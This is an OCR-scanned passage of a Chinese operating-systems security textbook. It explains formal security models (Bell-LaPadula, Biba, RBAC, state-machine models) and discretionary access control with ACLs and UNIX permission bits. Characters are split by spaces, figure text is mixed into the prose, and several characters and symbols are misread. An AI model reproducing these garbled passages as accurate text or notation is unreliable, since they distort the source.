(1) 它 是 精确 的 、 无 歧义 的 。 

(2) 它 是 简易 和 抽象 的 ,所 以 容易 理解 。 

(3) 它 是 一 般 性 的 : 只 涉及 安全 性 质 , 而 不 过 度 地 牵扯 系统 的 功能 或 其 实现 。 

(4) 它 是 安全 策略 的 明显 表现 。 

安全 模型 一 般 分 为 两 种 : 形式 化 的 安全 模型 和 非 形式 化 的 安全 模型 。 非 形式 化 安全 
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模型 仅 模拟 系统 的 安全 功能 ;形式 化 安全 模型 则 使 用 数学 模型 ,精确 地 描述 安全 性 及 其 在 


系统 中 使 用 的 情况 。 
如 图 5-2 所 示 , 对 于 高 安全 级 别 的 操作 系统 ,尤其 是 那些 以 安全 内 核 为 基础 的 操作 系 
非 形式 化 开发 路 径 形式 化 开发 路 径 。 统 , 需 要 用 形式 化 的 开发 路 径 来 实现 。 这 时 安 
安全 需求 强生 本国 | 全 模型 就 机 求 是 运用 形式 化 的 数学 符号 来 精 
f 确 表达 。 形 式 化 的 安全 模型 是 设计 开发 高 级 
(证 ) 《证明 ) 别 安全 系统 的 前 提 。 如 果 是 用 非 形式 化 的 开 
i | 发 路 径 ,修改 一 个 现 有 的 操作 系统 以 改进 它 的 
| T 安全 性 能 , 则 只 能 达到 中 等 的 安全 级 别 ,即使 
Gli 证 如 此 ,编写 一 个 用 自然 语言 描述 的 非 形式 化 安 
全 模型 也 是 很 值得 的 ,因为 安全 模型 可 以 保证 
实现 实现 当 设计 是 和 安全 模型 一 致 时 ,实现 的 系统 是 安 


图 5-2 安全 模型 与 安全 操作 系统 开发 过 程 ”全 的 。 
为 满足 简易 性 ,模型 仅仅 只 需 模 拟 系统 中 

与 安全 相关 的 功能 ,同时 可 以 省 略 掉 系 统 中 的 其 他 与 安全 无 关 的 功能 ,这 也 是 系统 安全 模 
型 和 形式 化 功能 规范 之 间 的 差别 ,因为 相 比较 而 言 形 式 化 功能 规范 包括 了 过 多 的 与 安全 
策略 无 关 的 系统 功能 特征 。 

1. 形式 化 安全 模型 设计 

J. P. Anderson 指出 ,要 开发 安全 系统 首先 必须 建立 系统 的 安全 模型 ,完成 安全 系统 
的 建 模 之 后 ,再 进行 安全 内 核 的 设计 和 实现 。 在 高 等 级 安全 操作 系统 开发 中 ,要 求 采 用 形 
式 化 安全 模型 来 模拟 安全 系统 ,从 而 可 以 正确 地 综合 系统 的 各 类 因素 ,这 些 因素 包 括 : 系 
统 的 使 用 方式 、 使 用 环境 类 型 .授权 的 定义 、 共 享 的 客体 (系统 资源 ) 共享 的 类 型 和 受 控 共 
享 思想 等 。 所 有 这 些 因素 应 构成 安全 系统 的 形式 化 抽象 描述 ,使 得 系统 可 以 被 证 明 是 完 
整 的 ` 反 映 真 实 环境 的 .逻辑 上 能 够 实现 程序 的 受 控 执 行 的 。 

形式 化 安全 策略 模型 设计 要 求人 们 不 仅 要 建立 深刻 的 模型 设计 理论 ,而且 要 发 掘 出 
具有 坚实 理论 基础 的 实现 方法 。 为 了 模型 的 形式 化 ,必须 遵循 形式 设计 的 过 程 及 表达 
方式 。 

尽管 目前 有 不 少 文献 探讨 这 个 问题 ,但 是 如 何 开 发 一 个 模型 仍然 是 很 困难 的 。Bell 
把 安全 策略 划分 为 四 个 层次 ,而 Lapadula 则 把 模型 设计 分 为 五 个 层次 ,前 者 说 明 策略 在 
系统 设计 的 不 同 阶段 的 不 同 表现 形式 ,强调 策略 发 展 的 逻辑 过 程 ; 后 者 说 明 模 型 在 系统 设 
计 的 不 同 阶段 的 不 同 功能 要 求 ,强调 模型 对 象 的 逻辑 联系 ;因为 模型 对 象 必 须 通过 执行 策 
略 才能 形成 一 个 有 机 的 模型 整体 ,而 且 随 着 模型 在 不 同 层 次 的 发 展 , 模 型 对 象 执行 策略 的 
表现 形式 必 将 不 同 , 因 此 二 者 是 相辅相成 的 。 但 它们 也 仅 只 是 指明 了 模型 与 策略 设计 的 
逻辑 过 程 ,并 不 关心 这 些 逻 辑 过 程 的 实现 ,因为 作者 们 的 意图 主要 在 于 对 现 有 工作 进行 分 
类 总 结 。 但 是 面 对 一 个 具体 的 设计 ,实现 显然 是 重要 的 ;美国 国防 部 的 彩虹 系列 中 的 “对 
理解 可 信 系 统 中 安全 模型 的 指导 (A Guide To Understanding Security Modeling in 
Trusted System)”, 提 出 了 指导 实现 的 一 般 性 的 步骤 ,这 些 步骤 明显 受 Lapadula 对 模型 
设计 的 五 个 层次 划分 的 影响 。 下 面 分 析 这 些 步 又 与 模型 层次 的 关系 : 
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(1) 确定 对 外 部 接口 的 要 求 (Identify Reguirements on the External Interface) ,这 一 
步 主 要 明确 系统 主要 的 安全 需求 ,并 把 它们 与 其 他 问题 隔离 开 ; 这 些 需 求 将 足以 支持 已 知 
的 高 层 策略 对 象 一 一 可 信 对 象 ,因此 这 一 步 可 以 说 主要 是 给 出 系统 安全 的 确切 定义 ,提出 
支持 可 信 对 象 的 各 种 条 件 及 描述 安全 需求 的 各 种 机 制 和 方法 ,构造 一 个 外 部 模型 。 

(2) 确定 内 部 要 求 (Identify Internal Requirements) ,为 了 支持 已 确定 的 外 部 需求 , 系 
统 必须 对 系统 的 控制 对 象 进行 限制 ,这些 限制 往往 就 形成 了 模型 的 安全 性 定义 ,这 一 步 实 
质 上 就 是 把 安全 需求 与 系统 的 抽象 进行 结合 ,提出 合理 的 模型 变量 ,构造 一 个 内 部 模型 。 

(3) 为 策略 的 执行 设计 操作 规则 (Design Rules of Operation for Policy Enforcement) , 系 
统 实体 为 获得 安全 限制 必须 遵循 一 定 的 操作 规则 ,也 就 是 说 把 安全 策略 规则 化 ;以 确保 系 
统 在 有 效 完成 系统 任务 的 同时 ,系统 的 状态 始终 处 于 安全 状态 中 。 这 里 有 一 个 非常 值得 
注意 的 问题 就 是 Mclean 在 1987 年 提出 的 完备 性 问题 : 一 个 安全 状态 可 以 经 由 一 个 安全 
操作 进入 下 一 个 安全 状态 ,也 可 能 经 由 一 个 不 安全 操作 进入 下 一 个 安全 状态 ,也 就 是 说 安 
全 操作 只 是 确保 系统 的 状态 始终 处 于 安全 状态 的 充分 条 件 , 如 果 系 统 设计 得 不 完备 ,从 一 
个 安全 状态 进入 下 一 个 安全 状态 时 完全 可 以 规避 安全 操作 ,这 一 步 对 应 了 Lapadula 层次 
划分 的 操作 规则 层次 。 

(4) 确定 什么 是 已 经 知道 的 (Determine What Is Already Known) ,对 于 高 安全 等 级 
操作 系统 的 安全 模型 的 设计 必须 是 形式 化 的 ,而 且 是 可 形式 验证 的 ,因此 必须 选择 适当 的 
形式 规范 语言 ,开发 相应 的 形式 验证 工具 ,看 看 是 否 有 可 直接 使 用 或 进行 二 次 开发 的 形式 
验证 工具 ,尽量 优化 设计 开发 过 程 。 

(5) 论述 一 致 性 和 正确 性 (Demonstrate Consistency and Correctness), 这 一 步 可 以 
说 是 模型 的 评论 (Review) 阶 段 ,具体 到 操作 系统 安全 模型 的 设计 ,主要 内 容 应 该 包括 : 安 
全 需求 的 表达 是 否 准 确 、 合 理 ; 安 全 操作 规则 是 否 与 安全 需求 协调 一 致 ;安全 需求 是 否 在 
模型 中 得 到 准确 反映 ;模型 的 形式 化 与 模型 之 间 的 对 应 性 论证 等 。 

(6) 论述 关联 性 (Demonstrate Relevance) ,这 一 步 可 以 说 是 模型 的 实施 阶段 , 它 对 应 
Lapadula 层次 划分 的 功能 设计 层次 。 许 多 著名 的 系统 设计 (例如 , SCOMP、 Multics、 
ASOS 等 ) 都 把 它 称 为 模型 在 系统 中 的 解释 (Interpretation) ,也 有 人 把 它 称 为 模型 实现 。 
论述 关联 性 应 分 层次 进行 ,首先 是 实现 的 模式 ;其 次 是 实现 的 架构 ;再 次 是 模型 在 架构 里 
的 解释 ;最 后 是 实现 的 对 应 性 (Correspondence) 论 证 。 

2. 状态 机 模型 原理 

在 现 有 技术 条 件 下 ,安全 模型 大 都 是 以 状态 机 模型 作为 模拟 系统 状态 的 手段 ,通过 对 
影响 系统 安全 的 各 种 变量 和 规则 的 描述 和 限制 ,确保 系统 保持 安全 状态 。 所 以 这 里 首先 
简要 叙述 状态 机 模型 的 原理 ,然后 再 介绍 各 种 主要 的 安全 模型 。 

状态 机 模型 最 初 受到 欢迎 ,是 由 于 它们 用 模仿 操作 系统 和 硬件 执行 过 程 的 方法 描述 
了 计算 机 系统 , 它 将 一 个 系统 描述 为 一 个 抽象 的 数学 状态 机 器 。 在 这 样 的 模型 里 ,状态 变 
量 表示 机 器 的 状态 ,转换 函数 或 者 操作 规则 用 以 描述 状态 变量 的 变化 过 程 , 它 是 对 系统 应 
用 通过 请 求 系统 调用 从 而 影响 操作 系统 状态 的 这 一 方式 的 抽象 。 这 个 抽象 的 操作 系统 具 
有 正确 描述 状态 可 以 怎样 变化 和 不 可 以 怎样 变化 的 能 力 。 

其 实 将 一 个 系统 模拟 为 状态 机 的 思想 很 早 就 出 现 了 ,但 是 状态 机 模型 在 软件 开发 方 
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面 并 没有 得 到 广泛 的 应 用 ,问题 在 于 在 现 有 软 硬 件 技术 水 平 下 ,模拟 一 个 操作 系统 的 所 有 
状态 变量 是 非常 困难 的 ,也 可 以 说 是 不 可 能 的 。 巾 于 安全 模型 并 未 涉及 系统 的 所 有 状态 
变量 和 函数 , 它 仅仅 只 涉及 数目 有 限 的 几 个 安全 相关 的 状态 变量 ,这 使 得 在 用 状态 机 来 模 
拟 一 个 系统 的 安全 状态 变化 时 ,不 至 于 出 现 如 同 在 软件 开发 中 不 得 不 面临 的 ,由 于 状态 变 
量 太 多 而 引发 的 状态 爆炸 问题 ,所 以 状态 机 模型 在 系统 安全 模型 中 的 到 了 较为 广泛 的 应 
用 , 它 可 以 比较 自如 地 模拟 和 处 理 安全 相关 的 各 种 变量 和 函数 。 

开发 一 个 状态 机 安全 模型 包含 确定 模型 的 要 素 ( 变 量 .函数 ,规则 等 等 ) 和 安全 初始 状 
态 。 一 旦 证 明了 初始 状态 是 安全 的 并 且 所 有 的 函数 也 都 是 安全 的 ,精确 的 推导 会 表明 此 
时 不 论调 用 这 些 函 数 中 的 哪 一 个 ,系统 都 将 保持 在 安全 状态 。 

开发 一 个 状态 机 模型 要 求 采用 如 下 特定 的 步 又: 

(1) 定义 安全 相关 的 状态 变量 。 状 态 变量 表示 了 系统 的 主体 和 客体 \ 它 们 的 安全 属 
性 以 及 主体 与 客体 之 间 的 访问 权限 。 

(2) 定义 安全 状态 的 条 件 。 这 个 定义 是 一 个 不 变 式 , 它 表达 了 在 状态 转换 期 间 状 态 
变量 的 数值 所 必须 始终 保持 的 关系 。 

(3) 定义 状态 转换 函数 。 这 些 函 数 丘 述 了 状态 变量 可 能 发 生 的 变化 。 它 们 也 被 称 为 
操作 规则 ,因为 它们 的 意图 是 限制 系统 可 能 产生 的 类 型 ,而 非 列 举 所 有 可 能 的 变化 。 而 且 
系统 不 能 以 函数 不 允许 的 方式 修改 状态 变量 。 

(4) 检验 函数 是 否 维持 了 安全 状态 。 为 了 确定 模型 与 安全 状态 的 定义 是 否 一 致 , 必 
须 检 验 每 项 函数 ,要 求 如 果 系 统 在 运行 之 前 处 于 安全 状态 ,那么 系统 在 运行 之 后 仍 将 保持 
在 安全 状态 。 

(5) 定义 初始 状态 。 选 择 每 个 状态 变量 的 值 ,这 些 值 模拟 系统 在 最 初 的 安全 状态 中 
是 如 何 启动 的 。 

(6) 依据 安全 状态 的 定义 ,证 明 初 始 状态 安全 。 

3. 主要 安全 模型 介绍 

本 书 主要 介绍 具有 代表 性 的 BLP 机 密 性 安全 模型 、Biba 完整 性 安全 模型 和 RBAC 
安全 模型 。 此 外 ,还 有 Clark-Wilson 完整 性 安全 模型 .信息 流 模 型 ,DTE 安全 模型 和 无 干 
扰 安 全 模型 等 。 

1) Bell-Lapadula 模型 

Bell-Lapadula 模型 (简称 BLP 模型 ) 是 D. Elliott Bell 和 Leonard J. Lapadula 于 
1973 年 提出 的 一 种 适用 于 军事 安全 策略 的 计算 机 操作 系统 安全 模型 , 它 是 最 早 、 也 是 最 
常用 的 一 种 计算 机 多 级 安全 模型 之 一 。 

在 BLP 模型 中 将 主体 定义 为 能 够 发 起 行为 的 实体 ,如 进程 ;将 客体 定义 为 被 动 的 主 
体 行为 承担 者 ,如 数据 ,文件 等 ;将 主体 对 客体 的 访问 分 为 R( 只 读 ),W( 读 写 ),A( 只 写 )， 
E( 执 行 ), 以 及 C( 控 制 ) 等 几 种 访问 模式 ,其 中 C( 控 制 ) 是 指 该 主体 用 来 授予 或 撤销 另 一 
主体 对 某 一 客体 的 访问 权限 的 能 力 。BLP 模型 的 安全 策略 包括 两 部 分 : 自主 安全 策略 和 
强制 安全 策略 。 自 主 安全 策略 使 用 一 个 访问 矩阵 表示 ,访问 矩阵 第 工行 第 J 列 的 元 素 
Ms 表示 主体 S; 对 客体 O 的 所 有 人 允许 的 访问 模式 ,主体 只 能 按照 在 访问 矩阵 中 被 授予 的 
对 客体 的 访问 权限 对 客体 进行 相应 的 访问 。 强 制 安全 策略 包括 简单 安全 特性 和 * 特性 ， 
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系统 对 所 有 的 主体 和 客体 都 分 配 一 个 访问 类 属性 ,包括 主体 和 客体 的 密级 和 范畴 ,系统 通 
过 比较 主体 与 客体 的 访问 类 属性 控制 主体 对 客体 的 访问 。 

BLP 模型 是 一 个 状态 机 模型 , 它 形式 化 地 定义 了 系统 、 系 统 状态 以 及 系统 状态 间 的 
转换 规则 ;定义 了 安全 概念 ;制定 了 一 组 安全 特性 ,以 此 对 系统 状态 和 状态 转换 规则 进行 
限制 和 约束 ,使 得 对 于 一 个 系统 而 言 , 如 果 它 的 初始 状态 是 安全 的 ,并 且 所 经 过 的 一 系列 
规则 转换 都 保持 安全 ,那么 可 以 证 明 该 系统 的 终止 也 是 安全 的 。 

但 随 着 计算 机 安全 理论 和 技术 的 发 展 ,BLP 模型 已 不 足以 描述 各 种 各 样 的 安全 需 
求 。 应 用 BLP 模型 的 安全 系统 还 应 考虑 以 下 问题 : 

(1) 在 BLP 模型 中 ,可 信和 主体 不 受 * 特性 约束 ,访问 权限 太 大 ,不 符合 最 小 特权 原 
则 ,应 对 可 信 主 体 的 操作 权限 和 应 用 范围 进一步 细 化 。 

(2) BLP 模型 主要 注重 保密 性 控制 ,控制 信息 从 低 安全 级 传 向 高 安全 级 ,而 缺少 完整 
性 控制 ,不 能 控制 “向 上 写 (Write Up) ”操作 .而 “向 上 写 ” 操 作 存 在 着 潜在 的 问题 , 它 不 能 
有 效 地 限制 隐蔽 信道 。 

2) Biba 模型 

BLP 模型 通过 防止 非 授权 信息 的 扩散 保证 系统 的 安全 ,但 它 不 能 防止 非 授权 修改 系 
统 信息 。 于 是 Biba 等 人 在 1977 年 提出 了 第 一 个 完整 性 安全 模型 一 一 Biba 模型 ,其 主要 
应 用 类 似 BLP 模型 的 规则 来 保护 信息 的 完整 性 。Biba 模型 也 是 基于 主体 、 客 体 以 及 它们 
的 级 别 的 概念 的 。 模 型 中 主体 和 客体 的 概念 与 BLP 模型 相同 ,对 系统 中 的 每 个 主体 和 每 
个 客体 均 分 配 一 个 级 别 , 称 为 完整 级 别 。 每 个 完整 级 别 均 由 两 部 分 组 成 : 密级 和 范畴 。 
其 中 ,密级 是 如 下 分 层 元 素 集合 中 的 一 个 元 素 : { 极 重要 (Crucial) (C) ,非常 重要 (Very 
Important) (VD ,重要 (Important) (1)}。 此 集合 是 全 序 的 , 即 C 二 VI 二 I。 范 畴 的 定义 与 
BLP 模型 类 似 。 

基于 Biba 模型 的 完整 性 访问 控制 方案 认为 在 一 个 系统 中 完整 性 策略 的 主要 目标 是 
用 以 防止 对 系统 数据 的 非 授 权 修改 ,从 而 达到 对 整个 系统 数据 完整 性 进行 控制 的 目的 ,对 
于 职责 隔离 目标 , 则 是 通过 对 访问 类 的 恰当 划分 方案 来 实现 的 。Biba 完整 性 模型 努力 去 
实现 与 Bell 和 Lapadula 所 定义 的 机 密 性 分 级 数据 安全 相 类 似 的 完整 性 分 级 数据 安全 。 
Biba 定义 了 一 个 与 BLP 模型 完全 相反 的 模型 ,在 Biba 模型 中 声称 数据 项 存在 于 不 同 的 
完整 级 上 ,文件 的 完整 性 级 别 标签 确定 其 内 容 的 完整 性 程度 ,并 且 系 统 应 防止 完整 级 低 的 
数据 污染 高 完整 级 的 数据 ,特别 是 一 旦 一 个 程序 读 取 了 低 完整 级 数据 ,系统 就 禁止 其 写 高 
完整 级 的 数据 。 

Biba 模型 的 优势 在 于 其 简单 性 以 及 和 BLP 模型 相 结合 的 可 能 性 。Biba 模型 的 不 足 
之 处 主要 在 于 以 下 : 完整 标签 确定 的 困难 性 ;在 有 效 保护 数据 一 致 性 方面 是 不 充分 的 。 
Biba 模型 仅 在 Multics 和 VAX 等 少数 几 个 系统 中 实现 。 因 此 无 论 是 依据 Biba 模型 来 有 
效 实现 系统 完整 性 访问 控制 ,或 者 把 完整 性 和 机 密 性 相 结合 方面 , Biba 模型 都 难以 满足 
实际 系统 真正 的 需求 。 

3) 基于 角色 的 访问 控制 模型 

基于 角色 的 访问 控制 模型 (RBAC) 提供 了 一 种 强制 访问 控制 机 制 。 在 一 个 采用 
RBAC 作为 授权 访问 控制 的 系统 中 ,根据 公司 或 组 织 的 业务 特征 或 管理 需求 ,一 般 要求 在 
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系统 内 设置 若干 个 称 之 为 “角色 ”的 客体 ,用 以 支撑 RBAC 授权 访问 控制 机 制 的 实现 。 所 
谓 角色 ,用 普通 业务 系统 中 的 术语 来 说 ,就 是 业务 系统 中 的 岗位 、 职 位 或 者 分 工 。 例 如 在 
一 个 公司 内 ,财会 主管 ,会计 、 出 纳 \ 核 算 员 等 每 一 种 岗位 都 可 以 设置 多 个 职员 具体 从 事 该 
岗位 的 工作 ,因此 它们 都 可 以 视 为 角色 。 

在 一 个 采用 RBAC 机 制作 为 授权 访问 控制 机 制 的 系统 中 ,由 系统 管理 员 负 责 管理 系 
统 的 角色 集合 和 访问 权限 集合 ,并 将 这 些 权 限 ( 不 同类 别 和 级 别 ) 通 过 相应 的 角色 分 别 赋 
予 承担 不 同 工 作 职 责 的 终端 用 户 ,而 且 还 可 以 随时 根据 业务 的 要 求 或 变化 对 角色 的 访问 
权限 集 和 用 户 所 拥有 的 角色 集 进行 调整 ,这 里 也 包括 对 可 传递 性 的 限制 。 

在 RBAC 系统 中 ,要 求 明 确 区 分 权限 (Authority) 和 职责 (Responsibility) 这 两 个 概 
念 。 例 如 在 有 限 个 保密 级 别 的 系统 内 ,访问 权限 为 0 级 的 某 个 官员 ,就 不 能 访问 保密 级 别 
为 0 的 所 有 资源 ,此 时 0 级 是 他 的 权限 ,而 不 是 他 的 职责 。 再 如 一 个 用 户 或 操作 员 可 能 有 
权 访 问 资源 的 某 个 集合 ,但 是 不 能 涉及 有 关 授 权 分 配 等 工作 ;而 一 位 主管 安全 的 负责 人 可 
以 修改 访问 权限 ,可 以 分 配 授权 给 各 个 操作 员 ,但 是 不 能 同时 具备 访问 任何 数据 资源 的 权 
限 。 这 就 是 他 的 职责 。 这 些 职责 之 间 的 不 同 是 通过 不 同 的 角色 来 区 分 的 。 

RBAC 的 功能 相当 强大 ,适用 于 许多 类 型 (从 政府 机 构 到 商业 应 用 ) 的 用 户 需求 。 
Netware、Windows NT、Solaris 和 Selinux 等 操作 系统 中 都 采用 了 类 似 的 RBAC 技术 作 
为 访问 控制 手段 。 


5.3 访问 控制 


在 计算 机 系统 中 ,安全 机 制 的 主要 内 容 是 访问 控制 ,包括 以 下 3 个 任务 : 

(1) 授权 , 即 确定 可 给 予 哪些 主体 访问 客体 的 权力 。 

(2) 确定 访问 权限 ( 读 、 写 .执行 .删除 .追加 等 访问 方式 的 组 合 ) 。 

(3) 实施 访问 权限 。 

这 里 ,术语 “访问 控制 " 仅 适用 于 计算 机 系统 内 的 主体 和 客体 ,而 不 包括 外 界 对 系统 的 
访问 。 控 制 外 界 对 系统 访问 的 技术 是 标识 与 鉴别 。 

本 书 主要 讲述 自主 访问 控制 ,强制 访问 控制 和 基于 角色 的 访问 控制 三 种 形式 。 限 于 
篇 幅 ,基于 任务 的 访问 控制 和 基于 对 象 的 访问 控制 等 不 再 袭 述 。 


531 自主 访问 控制 


1. 基本 概念 

自主 访问 控制 DAC 是 最 常用 的 一 类 访问 控制 机 制 , 是 用 来 决定 一 个 用 户 是 否 有 权 
访问 一 些 特定 客体 的 一 种 访问 约束 机 制 。 需 要 自主 访问 控制 保护 的 客体 数量 取决 于 系统 
环境 ,几乎 所 有 的 系统 在 自主 访问 控制 机 制 中 都 包括 对 文件 .目录 、IPC 以 及 设备 的 访问 
控制 。 

为 了 实现 完备 的 自主 访问 控制 机 制 ,系统 要 将 访问 控制 矩阵 相应 的 信息 以 某 种 形式 
保存 在 系统 中 。 目 前 在 操作 系统 中 实现 的 DAC 机 制 是 基于 矩阵 的 行 或 列表 达 访 问 控制 
信息 。 
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基于 行 的 自主 访问 控制 机 制 在 每 个 主体 上 都 附加 一 个 该 主体 可 访问 的 客体 明细 表 ， 
根据 表 中 信息 的 不 同 又 可 分 成 以 下 3 种 形式 。 

(1) 能 力 表 (capabilities list)。 能 力 决定 用 户 是 否 可 以 对 客体 进行 访问 以 及 进行 何 
种 模式 的 访问 ( 读 、 写 ,执行 ) ,拥有 相应 能 力 的 主体 可 以 按照 给 定 的 模式 访问 客体 。 

(2) 前 级 表 (profiles)。 对 每 个 主体 赋予 的 前 级 表 , 包 括 受 保护 客体 名 和 主体 对 它 的 
访问 权限 。 当 主体 要 访问 某 客体 时 ,自主 访问 控制 机 制 将 检查 主体 的 前 级 是 否 具有 它 所 
请 求 的 访问 权 。 

(3) 口令 (password)。 在 基于 口令 机 制 的 自主 访问 控制 机 制 中 ,每 个 客体 都 相应 地 
有 一 个 口令 。 主 体 在 对 客体 进行 访问 前 ,必须 向 操作 系统 提供 该 客体 的 口令 。 如 果 正 确 ， 
它 就 可 以 访问 该 客体 。 

2) 基于 列 的 自主 访问 控制 机 制 

基于 列 的 自主 访问 控制 机 制 , 在 每 个 客体 上 都 附加 一 个 可 访问 它 的 主体 明细 表 , 它 有 
两 种 形式 , 即 保护 位 和 访问 控制 表 。 

(1) 保护 位 (protection bits)。 这 种 方法 对 所 有 主体 .主体 组 以 及 客体 的 拥有 者 指明 
一 个 访问 模式 集合 。 保 护 位 机 制 不 能 完备 地 表达 访问 控制 矩阵 ,一般 很 少 使 用 。 

(2) 访问 控制 表 (access control list, ACL)。 这 是 国际 上 流行 的 一 种 十 分 有 效 的 自主 
访问 控制 模式 , 它 在 每 个 客体 上 都 附加 一 个 主体 明细 表 , 表 示 访 问 控制 矩阵 。 表 中 的 每 一 
项 都 包括 主体 的 身份 和 主体 对 该 客体 的 访问 权限 ,其 一 般 结 构 如 图 5-3 所 示 。 


客体 filel: | IDIr | ID2.r ID3.x | … | IDn.rwx 


图 5-3 访问 控制 表 ACL 


对 于 客体 filel ,主体 ID1 对 它 只 具有 读 (r) 和 运行 (x) 的 权限 ,主体 ID2 只 具有 读 权 
限 , 主 体 ID3 只 具有 执行 的 权限 ,而 主体 IDn 则 对 它 同 时 具有 读 、 写 和 执行 的 权限 。 但 在 
实际 应 用 中 , 当 对 某 客体 可 访问 的 主体 很 多 时 ,访问 控制 表 将 会 变 得 很 长 。 而 在 一 个 大 系 
统 中 ,客体 和 主体 都 非常 多 ,这 时 使 用 这 种 一 般 形式 的 访问 控制 表 将 占用 很 多 CPU 时 
间 。 因 此 访问 控制 表 必 须 简 化 ,如 把 用 户 按 其 所 属 或 其 工作 性 质 进 行 分 类 ,构成 相应 的 组 
(group) ,并 设置 一 个 通配符 (wild card)“x*”, 代 表 任 何 组 名 或 主体 标识 符 , 如 图 5-4 
所 示 。 


文件 ALPHA 
Jones CRYPTO IWX Green 
. CRYPTO | rx * i 


5-4 ”访问 控制 表 的 优化 
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在 图 5-4 中 CRYPTO 组 中 的 用 户 Jones 对 文件 ALPHA 拥有 rwx 访问 权限 。 
CRYPTO 同 组 中 的 其 他 用 户 拥有 rx 权限 。Green 如 果 不 在 CRYPTO 同 组 中 ,就 没有 任 
何 权 限 。 其 他 用 户 拥有 r 权限。 通过 这 种 简化 ,访问 控制 表 就 大 大 缩小 了 ,效率 提高 了 ， 
并 且 也 能 够 满足 自主 访问 控制 的 需要 。 

2. 实现 举例 

1) 拥有 者 / 同 组 用 户 / 其 他 用 户 模式 

在 UNIX、Linux、VMS 等 系统 中 ,实现 了 一 种 十 分 简单 、 常 用 而 又 有 效 的 自主 访问 控 
制 模式 ,就 是 在 每 个 文件 上 附加 一 段 有 关 访 问 控制 信 
息 的 二 进 制 位 ,如 图 5-5 所 示 。 

这 些 二 进 制 位 反映 了 不 同类 别 用 户 的 访问 方式 ， 
拥有 者 | 同 组 用 户 | 其 他 用 户 | 他 们 是 文件 的 拥有 者 ,与 文件 拥有 者 同 组 的 用 户 及 其 

他 用 户 ( 一 般 称 为 9 比特 位 模式 )。 即 : 
图 5-5 常用 的 自主 访问 控制 模式 (1) owner 的 3 位 反映 此 客体 的 拥有 者 对 它 的 访 
问 权 限 。 

(2) group 的 3 位 反映 owner 同 组 用 户 对 此 客体 的 访问 权限 。 

(3) other 的 3 位 反映 其 他 用 户 对 此 客体 的 访问 权限 。 

这 种 模式 的 一 个 很 大 缺点 就 是 客体 的 拥有 者 不 能 够 精确 控制 某 个 用 户 对 其 客体 的 访 
问 权 。 比 如 不 能 够 指定 与 owner 同 组 的 用 户 A 对 该 客体 具有 读 、 写 、 执 行 权 限 , 而 与 
owner 同 组 的 用 户 B 不 可 以 对 该 客体 有 任何 权限 。 

2) 访问 控制 表 (ACL) 和 “拥有 者 / 同 组 用 户 / 其 他 用 户 ” 相 结合 的 模式 

实际 实现 的 安全 操作 系统 UNIX SVR 4. 1ES 采用 了 “拥有 者 / 同 组 /其 他 用 户 ” 模 式 
和 访问 控制 表 相 结合 的 方法 ,访问 控制 表 只 对 “拥有 者 / 同 组 /其 他 用 户 ” 无 法 分 组 的 用 户 
才 使 用 。 两 种 自主 访问 控制 模式 共存 于 系统 之 中 , 既 保 持 了 与 原 系统 的 兼容 性 ,又 将 用 户 
控制 粒度 细 化 到 系统 中 的 单个 用 户 。 系 统 能 够 赋予 或 排除 某 一 个 用 户 对 一 文件 或 目录 的 
访问 权限 ,克服 了 原 UNIX 系统 只 能 将 访问 权限 分 配 到 组 或 所 有 其 他 用 户 这 样 一 种 较 粗 
粒度 的 局 限 性 。 

UNIX SVR 4. 1ES 在 文件 系统 中 ,针对 文件 的 索引 结构 开发 ACL 项 及 相关 信息 项 ， 
使 每 个 文件 对 应 一 个 ACL。 在 IPC 的 索引 结构 中 开发 ACL 项 及 相关 信息 项 ,使 每 个 消 
息 队 列 、 每 个 信号 量 集合 、 每 个 共享 存储 区 对 应 一 个 ACL。 

(1) ACL 语义 。 一 个 ACL 是 对 应 于 一 个 客体 的 三 元 组 二 a_type,a_id,a_perm 过 的 
集合 ,每 个 三 元 组 称 为 ACL 的 一 项 ,每 项 表示 人 允许 某 个 ( 些 ) 用 户 对 该 文件 的 访问 权 
限 , 如 : 


=type,id,perm> 
其 中 ,type 表示 id 为 用 户 ID, 还 是 用 户 组 ID,perm 表示 允许 id 代表 的 用 户 对 该 文件 的 访 
问 权 限 。 
(2) 对 ACL 的 操作 。 用 户 可 以 对 一 个 客体 对 应 的 ACL 进行 “授权 “取消”“ 查 阅 ” 
等 操作 。 
。“ 授 权 ” 操 作用 于 将 一 个 指定 用 户 的 标识 符 和 对 应 的 访问 权限 加 入 到 一 个 ACL 
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之 中 ; 

*。“ 取 消 ?操作 用 于 从 指定 标识 符 项 的 访问 权限 中 取消 某 些 访问 权限 ; 

。“ 查 阅 ” 操 作用 于 读 取 一 个 指定 客体 对 应 的 ACL 的 内 容 。 

(3) DAC 安全 检查 策略 。 

。 车 进程 以 x 权限 访问 客体 , 则 x 必须 在 客体 的 相应 ACL 项 中 ; 

。 若 进程 搜索 一 路 径 path, 则 进程 必须 具有 路 径 名 中 每 一 目录 分 量 的 搜索 权 。 

进程 访问 一 个 文件 时 ,调用 自主 访问 控制 机 制 。 将 进程 的 uid、gid 等 用 户 标识 信息 
和 请 求 访问 方式 mode 与 ACL 中 的 项 相 比较 ,检验 是 否 允 许 进程 以 mode 方式 访问 该 
文件 。 

自主 访问 控制 机 制 是 保护 计算 机 信息 系统 资源 不 被 非法 访问 的 一 种 有 效 的 手段 ,但 
它 有 一 个 明显 的 缺点 ,就 是 这 种 控制 是 自主 的 。 虽 然 这 种 自主 性 为 用 户 提 供 了 很 大 的 灵 
活性 ,但 缺乏 高 安全 等 级 所 需 的 安全 性 。 系 统 需要 采取 更 强 的 访问 控制 手段 ,这 就 是 强制 
访问 控制 。 


532 强制 访问 控制 


1. 基本 概念 

在 强制 访问 控制 机 制 下 ,系统 中 的 每 个 进程 ,每 个 文件 ,每 个 IPC 客体 (消息 队列 、 信 
号 量 集 合 和 共享 存储 区 ) 都 被 赋予 了 相应 的 安全 属性 ,这 些 安全 属性 是 不 能 改变 的 , 它 由 
管理 部 门 或 由 操作 系统 自动 地 按照 严格 的 规则 来 设置 ,不 像 访问 控制 表 那 样 由 用 户 或 他 
们 的 程序 直接 或 间接 地 修改 。 

强制 访问 控制 和 自主 访问 控制 是 两 种 不 同类 型 的 访问 控制 机 制 , 它 们 常 结合 起 来 使 
用 。 强 制 访问 控制 用 于 将 系统 中 的 信息 分 密级 和 类 进行 管理 ,适用 于 政府 部 门 .军事 和 金 
融 等 领域 。 

通常 强制 访问 控制 可 以 有 许多 不 同 的 定义 ,但 它们 都 同 美国 国防 部 定义 的 多 级 安全 
策略 相 接近 ,所 以 人 们 一 般 都 将 强制 访问 控制 和 多 级 安全 体系 相提并论 。 

